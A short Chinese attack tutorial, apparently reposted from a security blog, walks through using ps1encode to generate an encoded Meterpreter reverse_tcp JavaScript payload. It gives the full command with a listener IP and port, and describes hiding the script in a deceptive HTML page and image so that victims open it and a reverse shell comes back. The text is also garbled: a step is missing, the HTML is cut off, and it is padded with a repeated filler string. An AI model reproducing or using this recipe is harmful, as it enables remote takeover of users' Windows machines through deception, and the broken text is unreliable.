利用工具
项目地址:https://github.com/CroweCybersecurity/ps1encode
适用场景:目标主机Windows系列
攻击流程
1、下载ps1encode:
2、生成载荷
./ps1encode.rb --LHOST 192.168.67.128 --LPORT 4444 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js >> shell.js
3、使用Msf进行本地监听
4、创建隐蔽的html文件以及图片文件进行迷惑用户,在html文件中引用恶意的JS文件:
<html>
<title>SimpleTest</title>
<body>
<p style=\\\"display:none\\\" data-type=\\\"png\\\" data-w=\\\"980\\\" style=\\\"\\\">
6、之后成功反弹shell回来
凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字
原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34126.html